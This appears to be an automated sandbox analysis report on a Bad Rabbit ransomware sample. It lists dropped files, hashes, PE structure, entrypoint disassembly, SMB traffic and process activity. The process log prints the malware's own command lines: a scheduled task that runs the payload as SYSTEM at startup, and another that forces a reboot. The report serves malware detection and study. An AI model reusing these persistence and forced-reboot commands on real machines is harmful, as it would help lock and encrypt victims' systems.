                                                                    MD5:E3C22FDCD63EEB3FF1832CD92F8EFC6D
                                                                    SHA1:A26805133296D2B6AA8AB89B91179504153482BD
                                                                    SHA-256:C35637D81B3F1DCDF0FE4E3A19BAF250F3158727AA053C4413E1628A91FFD166
                                                                    SHA-512:8EC1C9D7B7A37835875062456CC6A6067C8896EEF5F9433DD25A6E941B3474BF1CAD40C9D252AA3548E1AFEB03EF1C629F7CB47642B655914499E8368599B5BA
                                                                    Malicious:false
                                                                    Preview:3...... .......A.......X\...;...{......................0.!..........{A.9....}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................A.9....}...................8e.9....}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\Public\Desktop\DECRYPT.lnk

                                                                    Download File
                                                                    Process:C:\Windows\dispci.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Tue Jan 14 21:25:50 2025, mtime=Tue Jan 14 21:25:55 2025, atime=Tue Jan 14 21:25:50 2025, length=142848, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):725
                                                                    Entropy (8bit):4.697714529827064
                                                                    Encrypted:false
                                                                    SSDEEP:12:8iviLCQm/FMCXXUV5xfKB8VzjAaR6W+IWgL6CNb54VVILYumV:84HdZ0NieFAal+IWt2b54VVyfm
                                                                    MD5:529276EEC1D0C0D332420DF43AA5502E
                                                                    SHA1:379A9406BC4E2B3715548219A9D65B27829D0EDE
                                                                    SHA-256:45E4F67683F8199AEC9AFA6673CFC64DDC09508F3975A3CE451B5E755E4582BF
                                                                    SHA-512:25006C4B4C2196A7312DF05BE8CB16E1548F224BC70B9A2469F3A4C72DB54D2CB784F7F7B8BF3C20333A3D86D4EC7C6D0EC977A86197F49D082814426D7772AB
                                                                    Malicious:false
                                                                    Preview:L..................F.... ...4.GD.f...sGG.f..4.GD.f...............................P.O. .:i.....+00.../C:\...................V.1......Z;...Windows.@......OwH.Z;.....3......................%..W.i.n.d.o.w.s.....`.2......Z:. .dispci.exe..F.......Z:..Z:..............................d.i.s.p.c.i...e.x.e.......D...............-.......C...................C:\Windows\dispci.exe....D.E.C.R.Y.P.T.......\.....\.....\.W.i.n.d.o.w.s.\.d.i.s.p.c.i...e.x.e.........$..................C..B..g..(.#....`.......X.......849224...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..............A...1SPS.XF.L8C....&.m.%................S.-.1.-.5.-.1.8.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                    C:\Windows\2594.tmp

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):62328
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:C7CA77D847F1802502EF3B9228D388E4
                                                                    SHA1:80AB09116D877B924DFEC5B6E8EB6D3DDE35869E
                                                                    SHA-256:FDEF2F6DA8C5E8002FA5822E8E4FEA278FBA66C22DF9E13B61C8A95C2F9D585F
                                                                    SHA-512:B5C23209597ECDDBCDE6CD8E72392721C3C2848385AD3F4C644024979F777FD11F2DD19E763F443C4759BB339B047034997FB06566CE7D4574CF3E4B75F51B7D
                                                                    Malicious:true
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                    C:\Windows\cscc.dat

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):210632
                                                                    Entropy (8bit):6.677691827536191
                                                                    Encrypted:false
                                                                    SSDEEP:3072:zCBsPmcx7BTn/irEsrDUxo2vYsWwYEJOXKVviEWuwlVBgzUMqqDLW+z3AHW5:8sPnBT/irETNWiJOXKVvKBgz3qqDL1zt
                                                                    MD5:EDB72F4A46C39452D1A5414F7D26454A
                                                                    SHA1:08F94684E83A27F2414F439975B7F8A6D61FC056
                                                                    SHA-256:0B2F863F4119DC88A22CC97C0A136C88A0127CB026751303B045F7322A8972F6
                                                                    SHA-512:D62A19436ABA8B2D181C065076B4AB54D7D8159D71237F83F1AFF8C3D132A80290AF39A8142708ACB468D78958C64F338BA6AD0CAB9FBAC001A6A0BDDC0E4FAA
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: INDICATOR_TOOL_ENC_DiskCryptor, Description: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions, Source: C:\Windows\cscc.dat, Author: ditekSHen
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: LisectAVT_2403002C_35.exe, Detection: malicious, Browse
                                                                    • Filename: 09490699.exe, Detection: malicious, Browse
                                                                    • Filename: 09490699.exe, Detection: malicious, Browse
                                                                    • Filename: 07bb0738.exe, Detection: malicious, Browse
                                                                    • Filename: 4d44bed6.exe, Detection: malicious, Browse
                                                                    • Filename: 63416c4d.exe, Detection: malicious, Browse
                                                                    • Filename: irH9zMhZub.exe, Detection: malicious, Browse
                                                                    • Filename: 1jDe7zWnoe.exe, Detection: malicious, Browse
                                                                    • Filename: bpkAAJptGv.exe, Detection: malicious, Browse
                                                                    • Filename: 4W5dQXszUV.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............~...~...~...~..~.....w.~..x...~..x....~..#...~..#....~..#....~.Rich..~.................PE..d...9.S.........."......\...........0.......................................p............. .................................................0..P....P....... ...............`..t...0d...............................................`..(............................text...WI.......J.................. ..h.rdata...|...`...~...N..............@..H.data....0......."..................@....pdata....... ......................@..HINIT.........0...................... ....rsrc........P......................@..B.reloc..L....`......................@..B........................................................................................................................................................................................................................................

                                                                    C:\Windows\dispci.exe

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):142848
                                                                    Entropy (8bit):6.314365095327337
                                                                    Encrypted:false
                                                                    SSDEEP:3072:1keK/MwGT0834YW3pvyh8fcl/iL62iL6KK:Sn/MZd4YW3pvyxl/ini
                                                                    MD5:B14D8FAF7F0CBCFAD051CEFE5F39645F
                                                                    SHA1:AFEEE8B4ACFF87BC469A6F0364A81AE5D60A2ADD
                                                                    SHA-256:8EBC97E05C8E1073BDA2EFB6F4D00AD7E789260AFA2C276F0C72740B838A0A93
                                                                    SHA-512:F5DCBF3634AEDFE5B8D6255E20015555343ADD5B1BE3801E62A5987E86A3E52495B5CE3156E4F63CF095D0CEDFB63939EAF39BEA379CCAC82A10A4182B8DED22
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Christiaan Beek
                                                                    • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Windows\dispci.exe, Author: Florian Roth
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 97%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........sR.. R.. R.. I-. v.. I-$ F.. I-. &.. [.9 Q.. [.) C.. R.. ... I-. _.. I- S.. I-' S.. RichR.. ................PE..L...e..Y............................Ug.......0....@.................................a[....@.................................._..........,............................................................[..@............0...............................text...J........................... ..`.rdata..<@...0...B..................@..@.data...,]...........`..............@....rsrc...,............z..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\infpub.dat

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\download.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):410760
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:C4F26ED277B51EF45FA180BE597D96E8
                                                                    SHA1:E9EFC622924FB965D4A14BDB6223834D9A9007E7
                                                                    SHA-256:14D82A676B63AB046AE94FA5E41F9F69A65DC7946826CB3D74CEA6C030C2F958
                                                                    SHA-512:AFC2A8466F106E81D423065B07AED2529CBF690AB4C3E019334F1BEDFB42DC0E0957BE83D860A84B7285BD49285503BFE95A1CF571A678DBC9BDB07789DA928E
                                                                    Malicious:true
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.891913976230692
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:download.exe
                                                                    File size:441'899 bytes
                                                                    MD5:fbbdc39af1139aebba4da004475e8839
                                                                    SHA1:de5c8d858e6e41da715dca1c019df0bfb92d32c0
                                                                    SHA256:630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
                                                                    SHA512:74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87
                                                                    SSDEEP:12288:BHNTywFAvN86pLbqWRKHZKfErrZJyZ0yqsGO3XR63:vT56NbqWRwZaEr3yt2O3XR63
                                                                    TLSH:199412426729EE92D1E1B8F84093E7CC4BB97B090FB991EF9D993485CC79B8319380D5
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&\..G2..G2..G2..?...G2..?...G2......G2......G2..?...G2..G3..G2......G2......G2.Rich.G2.........................PE..L......Y...

                                                                    File Icon

                                                                    Icon Hash:2144b26d6c76b24d

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4012c0
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows cui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x59EC0396 [Sun Oct 22 02:33:58 2017 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:e3bda9df66f1f9b2b9b7b068518f2af1

                                                                    Authenticode Signature

                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                    Error Number:-2146869232
                                                                    Not Before, Not After
                                                                    • 15/12/2016 19:00:00 17/12/2017 18:59:59
                                                                    Subject Chain
                                                                    • CN=Symantec Corporation, OU=STAR Security Engines, O=Symantec Corporation, L=Mountain View, S=California, C=US
                                                                    Version:3
                                                                    Thumbprint MD5:015897C25450CE2E9CF3C42B623E4319
                                                                    Thumbprint SHA-1:AD96BB64BA36379D2E354660780C2067B81DA2E0
                                                                    Thumbprint SHA-256:C5E129D68BEF22CAF45A173328F33C244A3BDF3E959D8EC1F15DE556396247FA
                                                                    Serial:0EBFEA68D677B3E26CAB41C33F3E69DE

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    mov eax, 000012ACh
                                                                    call 00007F327C7E0F28h
                                                                    mov eax, dword ptr [00408000h]
                                                                    xor eax, ebp
                                                                    mov dword ptr [ebp-04h], eax
                                                                    push esi
                                                                    mov esi, dword ptr [00404004h]
                                                                    push edi
                                                                    call esi
                                                                    mov edi, eax
                                                                    test edi, edi
                                                                    je 00007F327C7E0D32h
                                                                    lea eax, dword ptr [ebp-00001250h]
                                                                    push eax
                                                                    mov dword ptr [ebp-00001250h], 00000000h
                                                                    call esi
                                                                    push eax
                                                                    call dword ptr [00404050h]
                                                                    mov esi, eax
                                                                    test esi, esi
                                                                    je 00007F327C7E0D0Eh
                                                                    cmp dword ptr [ebp-00001250h], 01h
                                                                    jne 00007F327C7E0BB3h
                                                                    xor eax, eax
                                                                    lea ebx, dword ptr [ebx+00000000h]
                                                                    movzx ecx, word ptr [eax+00406CF0h]
                                                                    mov word ptr [ebp+eax-0000124Ch], cx
                                                                    add eax, 02h
                                                                    test cx, cx
                                                                    jne 00007F327C7E0B7Bh
                                                                    jmp 00007F327C7E0BE8h
                                                                    mov eax, dword ptr [esi]
                                                                    push eax
                                                                    push edi
                                                                    call dword ptr [00404060h]
                                                                    mov ecx, dword ptr [esi]
                                                                    add esp, 08h
                                                                    lea esi, dword ptr [ecx+02h]
                                                                    jmp 00007F327C7E0B95h
                                                                    lea ecx, dword ptr [ecx+00h]
                                                                    mov dx, word ptr [ecx]
                                                                    add ecx, 02h
                                                                    test dx, dx
                                                                    jne 00007F327C7E0B87h
                                                                    sub ecx, esi
                                                                    sar ecx, 1
                                                                    cmp word ptr [eax+ecx*2], 0022h
                                                                    lea eax, dword ptr [eax+ecx*2]
                                                                    jne 00007F327C7E0B95h
                                                                    add eax, 02h
                                                                    cmp word ptr [eax], 0020h
                                                                    jne 00007F327C7E0B95h
                                                                    add eax, 02h
                                                                    lea edx, dword ptr [ebp-0000124Ch]
                                                                    sub edx, eax
                                                                    lea ecx, dword ptr [ecx+00h]
                                                                    movzx ecx, word ptr [eax]
                                                                    mov word ptr [edx+eax], cx

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [ASM] VS2008 SP1 build 30729
                                                                    • [ C ] VS2013 UPD5 build 40629
                                                                    • [ASM] VS2013 UPD5 build 40629
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [LNK] VS2010 SP1 build 40219

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6d8c0x64.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x90000x7088.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x689a30x3488
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x110000x1a8.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x40000x74.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x2ed30x3000098c323b1a59bcf15c1feb8055e58931False0.6101888020833334data6.5841037789243835IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x40000x302a0x32009cc3629beb9d1f37932d860de2e3a4f5False0.81data7.1772588683417196IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x80000x33c0x2004e5d61b2bd73632f0225e39a2e2c5144False0.048828125data0.1833387916558982IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x90000x70880x7200256c5e23a9ad8a276128f84017b2d79dFalse0.16615268640350878data4.204085780982396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x110000x24e0x40026cd68101ade4e5f70ab3cd5f35e0ad5False0.41796875data3.293138685594118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x92540xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.20309168443496803
                                                                    RT_ICON0xa0fc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.21931407942238268
                                                                    RT_ICON0xa9a40x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.2203757225433526
                                                                    RT_ICON0xaf0c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.19230769230769232
                                                                    RT_ICON0xbfb40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.14014522821576764
                                                                    RT_ICON0xe55c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.19230769230769232
                                                                    RT_ICON0xf6040x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.39893617021276595
                                                                    RT_GROUP_ICON0xfa6c0x68dataEnglishUnited States0.6826923076923077
                                                                    RT_VERSION0xfad40x450dataEnglishUnited States0.37681159420289856
                                                                    RT_MANIFEST0xff240x161ASCII text, with CRLF line terminatorsEnglishUnited States0.5495750708215298

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllExitProcess, GetCommandLineW, GetFileSize, CreateProcessW, HeapAlloc, HeapFree, GetModuleHandleW, GetProcessHeap, WriteFile, GetSystemDirectoryW, ReadFile, GetModuleFileNameW, CreateFileW, lstrcatW, CloseHandle, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter
                                                                    USER32.dllwsprintfW
                                                                    SHELL32.dllCommandLineToArgvW
                                                                    msvcrt.dllwcsstr, memcpy, free, malloc

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 14, 2025 23:25:54.175013065 CET49749445192.168.2.4173.222.162.32
                                                                    Jan 14, 2025 23:25:54.179801941 CET44549749173.222.162.32192.168.2.4
                                                                    Jan 14, 2025 23:25:54.179853916 CET49749445192.168.2.4173.222.162.32
                                                                    Jan 14, 2025 23:25:54.181539059 CET49749445192.168.2.4173.222.162.32
                                                                    Jan 14, 2025 23:25:54.188220024 CET44549749173.222.162.32192.168.2.4
                                                                    Jan 14, 2025 23:25:54.204817057 CET4975280192.168.2.4192.168.2.1
                                                                    Jan 14, 2025 23:25:54.247684956 CET49753445192.168.2.4173.222.162.32
                                                                    Jan 14, 2025 23:25:54.252549887 CET44549753173.222.162.32192.168.2.4
                                                                    Jan 14, 2025 23:25:54.252646923 CET49753445192.168.2.4173.222.162.32
                                                                    Jan 14, 2025 23:25:54.252840996 CET49753445192.168.2.4173.222.162.32
                                                                    Jan 14, 2025 23:25:54.257594109 CET44549753173.222.162.32192.168.2.4
                                                                    Jan 14, 2025 23:25:55.137398005 CET49675443192.168.2.4173.222.162.32
                                                                    Jan 14, 2025 23:25:55.215500116 CET4975280192.168.2.4192.168.2.1
                                                                    Jan 14, 2025 23:25:57.215562105 CET4975280192.168.2.4192.168.2.1
                                                                    Jan 14, 2025 23:25:58.439310074 CET49672443192.168.2.4173.222.162.32
                                                                    Jan 14, 2025 23:25:58.539627075 CET49753445192.168.2.4173.222.162.32
                                                                    Jan 14, 2025 23:26:15.560993910 CET44549749173.222.162.32192.168.2.4
                                                                    Jan 14, 2025 23:26:15.561197042 CET49749445192.168.2.4173.222.162.32
                                                                    Jan 14, 2025 23:26:15.561197996 CET49749445192.168.2.4173.222.162.32

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 14, 2025 23:26:14.503911018 CET6156853192.168.2.41.1.1.1
                                                                    Jan 14, 2025 23:28:14.154046059 CET5452653192.168.2.41.1.1.1

                                                                    ICMP Packets

                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                    Jan 14, 2025 23:25:54.204912901 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                                                                    Jan 14, 2025 23:25:55.215593100 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                                                                    Jan 14, 2025 23:25:57.215662003 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                                                                    Jan 14, 2025 23:26:12.093116999 CET192.168.2.4192.168.2.18270(Port unreachable)Destination Unreachable
                                                                    Jan 14, 2025 23:27:32.165023088 CET192.168.2.4192.168.2.18270(Port unreachable)Destination Unreachable

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 14, 2025 23:26:14.503911018 CET192.168.2.41.1.1.10x3b4Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 23:28:14.154046059 CET192.168.2.41.1.1.10x16e6Standard query (0)tse1.mm.bing.netA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 14, 2025 23:26:14.510740995 CET1.1.1.1192.168.2.40x3b4No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 14, 2025 23:26:46.625550032 CET1.1.1.1192.168.2.40x92f0No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 14, 2025 23:26:46.625550032 CET1.1.1.1192.168.2.40x92f0No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 23:28:14.160909891 CET1.1.1.1192.168.2.40x16e6No error (0)tse1.mm.bing.netmm-mm.bing.net.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 14, 2025 23:28:14.160909891 CET1.1.1.1192.168.2.40x16e6No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                    Jan 14, 2025 23:28:14.160909891 CET1.1.1.1192.168.2.40x16e6No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Users\user\Desktop\download.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\download.exe"
                                                                    Imagebase:0xc00000
                                                                    File size:441'899 bytes
                                                                    MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:1
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                    Imagebase:0xc0000
                                                                    File size:61'440 bytes
                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, Author: Christiaan Beek
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c schtasks /Delete /F /TN rhaegal
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:17:25:50
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:schtasks /Delete /F /TN rhaegal
                                                                    Imagebase:0x840000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:7
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:17:25:52
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
                                                                    Imagebase:0x240000
                                                                    File size:236'544 bytes
